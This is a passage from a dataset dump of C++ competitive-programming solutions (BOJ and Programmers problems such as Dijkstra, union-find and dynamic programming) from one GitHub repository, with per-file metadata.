0, 0}, {0, 1, 1}};\n vector<vector<int>> lock = {{1, 1, 1}, {1, 1, 0}, {1, 0, 1}};\n\n if(solution(key, lock)) cout << \"true\\n\";\n else cout << \"false\\n\";\n\n return 0;\n}" }, { "alpha_fraction": 0.4127906858921051, "alphanum_fraction": 0.4970930218696594, "avg_line_length": 14, "blob_id": "4756c1f10deb7d74799f5bb7c78dbe6ec56ad635", "content_id": "49bf0f6221bd9a395a28cd2e0218971d20525b19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 358, "license_type": "no_license", "max_line_length": 58, "num_lines": 23, "path": "/BOJ/Implementation/14681.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14681번: 사분면 고르기\n2021-03-23\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\tint x, y;\n\tcin >> x >> y;\n\n\tif (x > 0 && y > 0)\n\t\tcout << 1;\n\telse if (x < 0 && y > 0)\n\t\tcout << 2;\n\telse if (x < 0 && y < 0)\n\t\tcout << 3;\n\telse if (x > 0 && y < 0)\n\t\tcout << 4;\n\t\n\treturn 0;\n}" }, { "alpha_fraction": 0.4692832827568054, "alphanum_fraction": 0.4957337975502014, "avg_line_length": 18.88135528564453, "blob_id": "68df5d3574a5231b917655052152a15038e88f75", "content_id": "e69f67dfbef801b76cff04414de2256122531715", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1196, "license_type": "no_license", "max_line_length": 95, "num_lines": 59, "path": "/BOJ/Dijkstra/1916.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1916번: 최소비용 구하기\n2021-12-28\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 1001\n#define INF 100000001\nusing namespace std;\n\nint d[MAX];\nvector<pair<int, int>> graph[MAX];\n\nvoid dijkstra(int start) { \n priority_queue<pair<int, int>, vector<pair<int,int>>, greater<pair<int,int>>> pq; // 거리, 노드\n\n pq.push({0, start});\n d[start] = 0;\n\n while(!pq.empty()) {\n int distance = pq.top().first;\n int cur = pq.top().second;\n pq.pop();\n\n if(d[cur] < distance) continue;\n for(int i = 0 ; i < graph[cur].size() ; i++) {\n int newDistance = graph[cur][i].second;\n int next = graph[cur][i].first;\n\n if(distance + newDistance < d[next]) {\n d[next] = distance + newDistance;\n pq.push({d[next], next});\n }\n }\n }\n}\n\nint main() {\n int n, m;\n int x, y, z;\n int a, b;\n cin >> n >> m;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> x >> y >> z;\n graph[x].push_back(make_pair(y, z));\n }\n\n cin >> a >> b;\n\n fill(d, d + n + 1, INF);\n dijkstra(a);\n\n cout << d[b];\n\n return 0;\n}" }, { "alpha_fraction": 0.4473229646682739, "alphanum_fraction": 0.49740931391716003, "avg_line_length": 24.755556106567383, "blob_id": "d6efa24c2ccc473c27da5246bde7659319dcc178", "content_id": "34e63d36d2d02831c8c6048239c24c1d65a7226b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1168, "license_type": "no_license", "max_line_length": 98, "num_lines": 45, "path": "/BOJ/Dynamic Programming/2096.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2096번: 내려가기\nDATE: 2022-01-17\nDynamic Programming\nSliding Window\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num;\n cin >> n;\n\n int minArr[3], maxArr[3], minTmp[3], maxTmp[3];\n int input[3];\n\n for(int i = 0 ; i < n ; i++){\n cin >> input[0] >> input[1] >> input[2];\n\n if(i == 0) {\n for(int j = 0 ; j < 3 ; j++) minTmp[j] = maxTmp[j] = minArr[j] = maxArr[j] = input[j];\n continue;\n }\n\n minArr[0] = input[0] + min(minTmp[0], minTmp[1]);\n maxArr[0] = input[0] + max(maxTmp[0], maxTmp[1]);\n\n minArr[1] = input[1] + min({minTmp[0], minTmp[1], minTmp[2]});\n maxArr[1] = input[1] + max({maxTmp[0], maxTmp[1], maxTmp[2]});\n\n minArr[2] = input[2] + min(minTmp[1], minTmp[2]);\n maxArr[2] = input[2] + max(maxTmp[1], maxTmp[2]);\n\n for(int j = 0 ; j < 3 ; j++){\n minTmp[j] = minArr[j];\n maxTmp[j] = maxArr[j];\n }\n }\n \n cout << *max_element(maxArr, maxArr + 3) << \" \" << *min_element(minArr, minArr + 3);\n\n return 0;\n}" }, { "alpha_fraction": 0.4417129158973694, "alphanum_fraction": 0.46708962321281433, "avg_line_length": 19.03174591064453, "blob_id": "d0dd9530d9530b80a325ba140b847e2f04563111", "content_id": "849f5e5a8fe0b35aa1b48234b9ae027883c1c36e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1309, "license_type": "no_license", "max_line_length": 58, "num_lines": 63, "path": "/BOJ/Graph Theory/1976.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1976번: 여행 가자\nDATE: 2021-02-08\nUnion-Find\n*/\n#include <iostream>\n#define MAX 200\nusing namespace std;\n\nint arr[MAX][MAX];\n\nint getParent(int parent[], int x){\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent, parent[x]);\n}\n\nvoid unionParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\n//같은 그래프에 속하는지 확인\nint findParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a == b) return 1;\n else return 0;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n cin >> n >> m;\n\n int parent[n+1], dst[m];\n for(int i = 1 ; i <= n ; i++){\n parent[i] = i;\n }\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n cin >> arr[i][j];\n if(arr[i][j] == 1 || i==j) //같은 부모 노드를 갖도록함\n unionParent(parent, i+1, j+1); \n }\n }\n\n for(int i = 0 ; i < m ; i++){\n cin >> dst[i];\n if(i > 0){\n if(!findParent(parent, dst[i-1], dst[i])){\n cout << \"NO\";\n return 0;\n }\n }\n }\n\n cout << \"YES\";\n\n return 0;\n}" }, { "alpha_fraction": 0.4082733690738678, "alphanum_fraction": 0.44964027404785156, "avg_line_length": 17.566667556762695, "blob_id": "f737a00b971f99ef2617e6c90eff5fd9e72853be", "content_id": "5a0a0be74dd9ebdfdd1922c9b46bda457fa3fc9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 590, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Implementation/12904.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 12904번: A와 B\nDATE: 2021-11-22\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string s, t, tmp;\n cin >> s >> t;\n\n while(t.length() > s.length()){\n char last = t[t.length() - 1]; //t의 마지막 글자 \n t.erase(t.length() - 1, 1); //t의 마지막 글자 제거\n \n if(last == 'B'){\n reverse(t.begin(), t.end());\n }\n\n if(t == s) {\n cout << 1;\n return 0;\n }\n }\n\n cout << 0;\n return 0;\n}" }, { "alpha_fraction": 0.32930514216423035, "alphanum_fraction": 0.3645518720149994, "avg_line_length": 16.438596725463867, "blob_id": "3ed3b41c6e110d6703e486557591096d1b748bd4", "content_id": "5db392d0fb1fc91c4aa9c0d67d04e368f0aafd84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1041, "license_type": "no_license", "max_line_length": 58, "num_lines": 57, "path": "/BOJ/Binary Search/2343.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2343번: 기타 레슨\n2021-12-19\nBinary Search\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, num, ans = 1000000000;\n int start, end, mid, sum, cnt;\n \n cin >> n >> m;\n\n int arr[n];\n\n for(int i = 0 ; i < n ; i++) {\n cin >> arr[i];\n sum += arr[i];\n }\n\n start = 1;\n end = sum;\n\n while(start <= end) {\n cnt = 1;\n sum = 0;\n mid = (start + end) / 2;\n\n for(int i = 0 ; i < n ; i++) {\n if(arr[i] > mid) { // 모든 강의가 들어가야 함\n cnt = n + 1; // M <= N (cnt는 무조건 M보다 크게 됨)\n break;\n }\n\n sum += arr[i];\n\n if(sum > mid){\n cnt++;\n sum = arr[i];\n }\n }\n\n if(cnt <= m) {\n ans = min(ans, mid);\n end = mid - 1;\n }\n else {\n start = mid + 1;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.40717029571533203, "alphanum_fraction": 0.44430217146873474, "avg_line_length": 18.073171615600586, "blob_id": "91370efc4b060747f49bcd0884c6bf50820fdd55", "content_id": "f527fc1f3bc231b6ba674bb8f737da50e4bb6bcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 795, "license_type": "no_license", "max_line_length": 74, "num_lines": 41, "path": "/BOJ/Dynamic Programming/14501.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14501번: 퇴사\nDATE: 2021-10-07\nDynamic Programming\n*/\n#include <iostream>\n#include <algorithm>\n#include <vector>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, max_val;\n cin >> n;\n\n int arr[2][n];\n\n for(int i = 0 ; i < n ; i++) {\n vector<int> tmp;\n int t, p; //기간, 금액\n \n cin >> t >> p;\n arr[1][i] = t;\n\n if(i + t > n) {\n arr[0][i] = 0;\n continue;\n }\n\n for(int j = 0 ; j < i ; j++) {\n if(j + arr[1][j] <= i) tmp.push_back(arr[0][j]);\n }\n\n if(tmp.size() > 0) max_val = *max_element(tmp.begin(), tmp.end());\n arr[0][i] = max_val + p;\n }\n\n cout << *max_element(arr[0], arr[0] + n);\n\n return 0;\n}" }, { "alpha_fraction": 0.4497816562652588, "alphanum_fraction": 0.4606986939907074, "avg_line_length": 23.553571701049805, "blob_id": "ced03fd54aa575bb1842de59c4013509491a7572", "content_id": "2fed31925e1acfcf7f37cf3e0dedf7b1a03a6430", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1392, "license_type": "no_license", "max_line_length": 68, "num_lines": 56, "path": "/programmers/Level 2/menu_renewal.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 메뉴 리뉴얼\ndate: 2022-03-29\n*/\n#include <string>\n#include <vector>\n#include <algorithm>\n#include <map>\nusing namespace std;\n\nbool cmp(pair<string, int> a, pair<string, int> b){\n return a.second > b.second;\n}\n\nvector<string> solution(vector<string> orders, vector<int> course) {\n vector<string> answer;\n map<string, int> m; // 조합, 개수\n \n for(string i : orders){\n sort(i.begin(), i.end());\n \n for(int j : course){\n if(i.length() < j) continue;\n \n vector<bool> tmp(i.length(), true);\n for(int k = 0 ; k < j ; k++) tmp[k] = false;\n \n do{ \n string str;\n \n for(int k = 0 ; k < tmp.size() ; k++){\n if(!tmp[k]) str += i[k];\n }\n \n m[str]++;\n }while(next_permutation(tmp.begin(), tmp.end()));\n }\n }\n \n int arr[course.back() + 1];\n fill(arr, arr + course.back() + 1, 0);\n \n vector<pair<string, int>> v(m.begin(), m.end());\n sort(v.begin(), v.end(), cmp);\n \n for(auto i : v){\n if(i.second >= arr[i.first.length()] && i.second > 1) {\n arr[i.first.length()] = i.second;\n answer.push_back(i.first);\n }\n }\n \n sort(answer.begin(), answer.end());\n \n return answer;\n}" }, { "alpha_fraction": 0.3294491469860077, "alphanum_fraction": 0.3924788236618042, "avg_line_length": 29.467741012573242, "blob_id": "0de164123bd1d295b7a73b51745dad2615c72102", "content_id": "9f7550b57ddf57f67190c03f67558dbfbfcd786a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1894, "license_type": "no_license", "max_line_length": 94, "num_lines": 62, "path": "/BOJ/Dynamic Programming/17404.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 17404번: RGB거리 2\nDATE: 2021-07-29\nDynamic Programming\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 987654321\nusing namespace std;\n\nint input[1000][3];\nint house[3][1000][3];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, r, g, b, ans=MAX;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> r >> g >> b;\n input[i][0] = r;\n input[i][1] = g;\n input[i][2] = b;\n }\n\n for(int i = 0 ; i < 3 ; i++){\n copy(&input[0][0], &input[0][0] + 3000, &house[i][0][0]);\n \n for(int j = 0 ; j < 3 ; j++)\n if(i != j) house[i][0][j] = MAX;\n\n for(int j = 1 ; j < n ; j++){\n if(j == n -1){\n if(i == 0) {\n house[i][j][1] = min(house[i][j-1][0], house[i][j-1][2]) + house[i][j][1];\n house[i][j][2] = min(house[i][j-1][0], house[i][j-1][1]) + house[i][j][2];\n }\n else if(i == 1){\n house[i][j][0] = min(house[i][j-1][1], house[i][j-1][2]) + house[i][j][0];\n house[i][j][2] = min(house[i][j-1][0], house[i][j-1][1]) + house[i][j][2];\n }\n else if(i == 2){\n house[i][j][0] = min(house[i][j-1][1], house[i][j-1][2]) + house[i][j][0];\n house[i][j][1] = min(house[i][j-1][0], house[i][j-1][2]) + house[i][j][1];\n }\n\n house[i][j][i] = MAX;\n break;\n }\n\n house[i][j][0] = min(house[i][j-1][1], house[i][j-1][2]) + house[i][j][0];\n house[i][j][1] = min(house[i][j-1][0], house[i][j-1][2]) + house[i][j][1];\n house[i][j][2] = min(house[i][j-1][0], house[i][j-1][1]) + house[i][j][2];\n }\n\n ans = min(ans, *min_element(house[i][n-1], house[i][n-1] + 3));\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.35011184215545654, "alphanum_fraction": 0.37322893738746643, "avg_line_length": 22.330434799194336, "blob_id": "47097805ede177ee97aae2aa58ee4d5607bebbd5", "content_id": "9865df3b7021dbf770f36668d9871169df9a90c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2778, "license_type": "no_license", "max_line_length": 74, "num_lines": 115, "path": "/BOJ/Implementation/16235.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16235번: 나무 재테크\nDATE: 2022-02-09\nImplementation\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 11\nusing namespace std;\n\nint n, m, k;\nint addition[MAX][MAX]; // 추가할 양분의 양\nint nutrient[MAX][MAX]; // 해당 칸에 존재하는 양분의 양\nvector<int> ground[MAX][MAX]; // 해당 칸에 존재하는 나무의 나이\nvector<pair<pair<int,int>, int>> death; // 죽은 나무의 위치와 나이\n\nvoid spring(){\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++){\n sort(ground[i][j].begin(), ground[i][j].end());\n\n for(int k = 0 ; k < ground[i][j].size() ; k++){\n if(nutrient[i][j] >= ground[i][j][k]) {\n nutrient[i][j] -= ground[i][j][k];\n ground[i][j][k] += 1;\n }\n else {\n death.push_back({{i, j}, ground[i][j][k]});\n ground[i][j].erase(ground[i][j].begin() + k);\n k--;\n }\n }\n }\n }\n}\n\nvoid summer(){\n if(death.empty()) return;\n \n for(int i = 0 ; i < death.size() ; i++) {\n int x = death[i].first.first;\n int y = death[i].first.second;\n int add = death[i].second / 2;\n nutrient[x][y] += add;\n }\n\n death.clear();\n}\n\nvoid autumn(){ \n int dx[8] = {-1, -1, 0, 1, 1, 1, 0, -1};\n int dy[8] = {0, 1, 1, 1, 0, -1, -1, -1};\n\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++){\n for(int k = 0 ; k < ground[i][j].size() ; k++){\n if(ground[i][j][k] % 5 == 0) {\n for(int l = 0 ; l < 8 ; l++) {\n int nx = dx[l] + i;\n int ny = dy[l] + j;\n\n if(nx < 1 || ny < 1 || nx > n || ny > n) continue;\n ground[nx][ny].push_back(1);\n }\n }\n }\n }\n }\n}\n\nvoid winter(){\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++) {\n nutrient[i][j] += addition[i][j];\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int x, y, z;\n int ans = 0;\n\n cin >> n >> m >> k;\n\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++) {\n cin >> addition[i][j];\n nutrient[i][j] = 5;\n }\n }\n\n for(int i = 0 ; i < m ; i++) {\n cin >> x >> y >> z;\n ground[x][y].push_back(z);\n }\n\n while(k--){\n spring();\n summer();\n autumn();\n winter();\n }\n\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++){\n ans += ground[i][j].size();\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.41727495193481445, "alphanum_fraction": 0.44525548815727234, "avg_line_length": 21.243244171142578, "blob_id": "bae58b6577a56766061f5ef08d8771a4cc5f7dcb", "content_id": "0102faa7e14be304fa27a90aa0ef0efe17b4a860", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 834, "license_type": "no_license", "max_line_length": 69, "num_lines": 37, "path": "/BOJ/Implementation/9935.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9935번: 문자열 폭발\nDATE: 2021-03-22\n*/\n#include <iostream>\n#include <string>\nusing namespace std;\n\n int main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str, bomb, ans=\"\";\n int cnt=0;\n cin >> str >> bomb;\n\n for(int i = 0 ; i < str.length() ; i++){\n ans += str[i];\n if(str[i] == bomb[bomb.length()-1]){\n int ansIdx = ans.length()-1;\n int bombIdx = bomb.length()-1;\n\n for(int j = bomb.length() ; j > 0 ; j--){\n if(ans[ansIdx--] == bomb[bombIdx--]) cnt++;\n }\n \n if(cnt == bomb.length()){\n ans.erase(ans.length()-bomb.length(), bomb.length());\n }\n\n cnt = 0;\n }\n }\n\n if(ans == \"\") cout << \"FRULA\";\n else cout << ans;\n\n return 0;\n }" }, { "alpha_fraction": 0.3503575026988983, "alphanum_fraction": 0.3901940882205963, "avg_line_length": 21.272727966308594, "blob_id": "758f6c32de9577bfc88cf4d9778ebd0760d414e3", "content_id": "d0abd6fa105465b8aa335158ce5606130cc44452", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1017, "license_type": "no_license", "max_line_length": 60, "num_lines": 44, "path": "/BOJ/Graph Theory/11404.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11404번: 플로이드\nDATE: 2021-04-12\nUPDATE: 2022-03-04\nFloyd-Warshall Algorithm\n*/\n#include <iostream>\n#include <algorithm>\n#define INF 1e9\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n cin >> n >> m;\n\n int arr[n+1][n+1];\n fill(&arr[0][0], &arr[n][n + 1], INF);\n\n for(int i = 0 ; i < m ; i++){\n int a, b, c;\n cin >> a >> b >> c;\n arr[a][b] = min(arr[a][b], c);\n }\n\n for(int k = 1 ; k <= n ; k++){ //거쳐가는 노드\n for(int i = 1 ; i <= n ; i++){ //출발 노드\n for(int j = 1 ; j <= n ; j++){ //도착 노드\n if(arr[i][k] + arr[k][j] < arr[i][j])\n arr[i][j] = arr[i][k] + arr[k][j];\n }\n }\n }\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n if(i == j || arr[i][j] == INF) cout << 0 << \" \";\n else cout << arr[i][j] << \" \";\n }\n cout << \"\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4182879328727722, "alphanum_fraction": 0.4785992205142975, "avg_line_length": 12.20512866973877, "blob_id": "c2a5f56e5db2e66c9d23c61865361a447fc7e814", "content_id": "917b8b7c0478120aa44eabb7c90c95c892ea4b1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 522, "license_type": "no_license", "max_line_length": 58, "num_lines": 39, "path": "/BOJ/Brute Force/2231.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2231번: 분해합\n2021-05-18\nBrute Force\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 1000001\nusing namespace std;\n\nint f(int num){\n int sum = num;\n\n while (num != 0) {\n\t\tsum += num % 10;\n\t\tnum = num / 10;\n\t}\n\n\treturn sum;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n for(int i = 1 ; i < n ; i++){\n int num = f(i);\n\n if(num == n){\n cout << i;\n return 0;\n }\n }\n\n cout << 0;\n\n return 0;\n}" }, { "alpha_fraction": 0.3429228961467743, "alphanum_fraction": 0.39355581998825073, "avg_line_length": 16.399999618530273, "blob_id": "40015985d17543c0d964fba9c8f884f0cd5309d6", "content_id": "8925d587c897b045e39d80cb17d29be089b10a39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 879, "license_type": "no_license", "max_line_length": 60, "num_lines": 50, "path": "/BOJ/BFS_DFS/1697.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "WINDOWS-1252", "text": "/*\nBOJ 1697¹ø: ¼û¹Ù²ÀÁú\nDATE: 2021-01-20\nBFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 100001\n\nusing namespace std;\n\nint sec[MAX] = { 0, };\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n int n, k, ans;\n int move[] = { -1, 1, 2 };\n queue <int> q;\n\n cin >> n >> k;\n\n sec[n] = 1;\n q.push(n);\n\n while (!q.empty()) {\n int cur = q.front();\n q.pop();\n\n if (cur == k) {\n cout << sec[cur] - 1;\n break;\n }\n\n int next;\n for (int i = 0; i < 3; i++) {\n if (i == 0 || i == 1)\n next = cur + move[i];\n else\n next = cur * move[i];\n\n if (next >= 0 && next <= 100000 && !sec[next]) {\n q.push(next);\n sec[next] = sec[cur] + 1;\n }\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3130003809928894, "alphanum_fraction": 0.3492184579372406, "avg_line_length": 23.754716873168945, "blob_id": "0a948012662371fe3ffef19bca81e36741803039", "content_id": "c33aff34613b517b7459048f73a92c1824558f1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2653, "license_type": "no_license", "max_line_length": 99, "num_lines": 106, "path": "/BOJ/Implementation/21610.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 21610번: 마법사 상어와 비바라기\nDATE: 2022-03-14\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint n, m, ans;\nint arr[51][51];\nvector<pair<int,int>> cloud, mv_cloud;\nint dr[8] = {0, -1, -1, -1, 0, 1, 1, 1};\nint dc[8] = {-1, -1, 0, 1, 1, 1, 0, -1};\nint diagonalR[4] = {-1, -1, 1, 1};\nint diagonalC[4] = {-1, 1, 1, -1};\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int d, s;\n cin >> n >> m;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n cin >> arr[i][j];\n }\n }\n\n cloud.push_back({n - 1, 1});\n cloud.push_back({n - 1, 2});\n cloud.push_back({n, 1});\n cloud.push_back({n, 2});\n\n for(int i = 0 ; i < m ; i++){\n cin >> d >> s;\n\n for(int j = 0 ; j < cloud.size() ; j++){ // 1번\n int r = cloud[j].first;\n int c = cloud[j].second;\n int nr, nc;\n\n for(int k = 0 ; k < s ; k++){\n if(r == 1 && r + dr[d - 1] == 0) nr = n;\n else if(r == n && r + dr[d - 1] == n + 1) nr = 1;\n else nr = r + dr[d - 1];\n\n if(c == 1 && c + dc[d - 1] == 0) nc = n;\n else if(c == n && c + dc[d - 1] == n + 1) nc = 1;\n else nc = c + dc[d - 1];\n\n r = nr;\n c = nc;\n }\n\n mv_cloud.push_back({r, c});\n }\n\n // 2번\n for(int j = 0 ; j < mv_cloud.size() ; j++) arr[mv_cloud[j].first][mv_cloud[j].second] += 1;\n\n // 4번\n for(int j = 0 ; j < mv_cloud.size() ; j++){\n int r = mv_cloud[j].first;\n int c = mv_cloud[j].second;\n int cnt = 0;\n\n for(int k = 0 ; k < 4 ; k++){\n int nr = r + diagonalR[k];\n int nc = c + diagonalC[k];\n\n if(nr == 0 || nc == 0 || nr == n + 1 || nc == n + 1) continue;\n if(arr[nr][nc] > 0) cnt++;\n }\n\n arr[r][c] += cnt;\n }\n\n cloud.clear();\n\n // 5번\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n if(arr[i][j] > 1) {\n pair<int,int> p = {i, j};\n\n if(find(mv_cloud.begin(), mv_cloud.end(), p) == mv_cloud.end()){\n cloud.push_back({i, j});\n arr[i][j] -= 2;\n }\n }\n }\n }\n\n mv_cloud.clear();\n }\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n ans += arr[i][j];\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4146501123905182, "alphanum_fraction": 0.43100064992904663, "avg_line_length": 18.615385055541992, "blob_id": "6a7b471e06f22d2b05e600c4b097750e3c5dbb10", "content_id": "fed979febba4d8acaf2baf6c1ab21c1bf91d194f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1537, "license_type": "no_license", "max_line_length": 70, "num_lines": 78, "path": "/BOJ/Graph Theory/14725.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14725번: 개미굴\nDATE: 2021-07-05\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nstruct Node{\n string food;\n vector<Node> children;\n};\n\nNode head;\nNode* cur;\n\nbool cmp(Node a, Node b){\n return a.food < b.food;\n}\n\nbool check(string str){\n for(int k = 0 ; k < cur->children.size() ; k++){\n if(cur->children[k].food == str){\n cur = &(cur->children[k]);\n return true;\n }\n }\n\n return false;\n}\n\nvoid print(Node node, int depth){\n if(node.food != \"\"){\n for(int i = 0 ; i < depth ; i++){\n cout << \"--\";\n }\n cout << node.food << '\\n';\n }\n\n for(int i = 0 ; i < node.children.size() ; i++){\n print(node.children[i], depth+1);\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n int n, k;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n int k;\n cin >> k;\n \n cur = &head;\n\n for(int j = 0 ; j < k ; j++){\n cin >> str;\n if(!check(str)){\n Node node;\n node.food = str;\n cur->children.push_back(node);\n\n sort(cur->children.begin(), cur->children.end(), cmp);\n for(int k = 0 ; k < cur->children.size() ; k++){\n if(cur->children[k].food == str){\n cur = &cur->children[k];\n }\n }\n }\n }\n }\n \n print(head, -1);\n\n return 0;\n}" }, { "alpha_fraction": 0.41980475187301636, "alphanum_fraction": 0.4686192572116852, "avg_line_length": 16.095237731933594, "blob_id": "ad13ca81378801cdf6f273ee6465746a0423d379", "content_id": "4ee4322defebac5fdea8f0e5e0d5b5ffdd63912b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 731, "license_type": "no_license", "max_line_length": 58, "num_lines": 42, "path": "/BOJ/Two Pointer/14921.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14921번: 용액 합성하기\nDATE: 2022-01-17\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> v, ans(2);\n int n, num;\n int start, end, min;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> num;\n v.push_back(num);\n }\n\n start = 0; end = n - 1;\n min = 100000001;\n\n while(start < end){\n int sum = v[start] + v[end];\n\n if(abs(sum) < min){\n ans[0] = v[start];\n ans[1] = v[end];\n min = abs(sum);\n }\n\n if(sum < 0) start++;\n else end--;\n }\n\n cout << ans[0] + ans[1];\n\n return 0;\n}" }, { "alpha_fraction": 0.37403401732444763, "alphanum_fraction": 0.41112828254699707, "avg_line_length": 18.636363983154297, "blob_id": "bfe6e8ab81d38a0e07137e59f3fed4e21fa7f9ac", "content_id": "e2593633bc67853e87597cca46f6329cd55dda7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 655, "license_type": "no_license", "max_line_length": 58, "num_lines": 33, "path": "/BOJ/Brute Force/2798.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2798번: 블랙잭\n2021-05-18\nBrute Force\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); 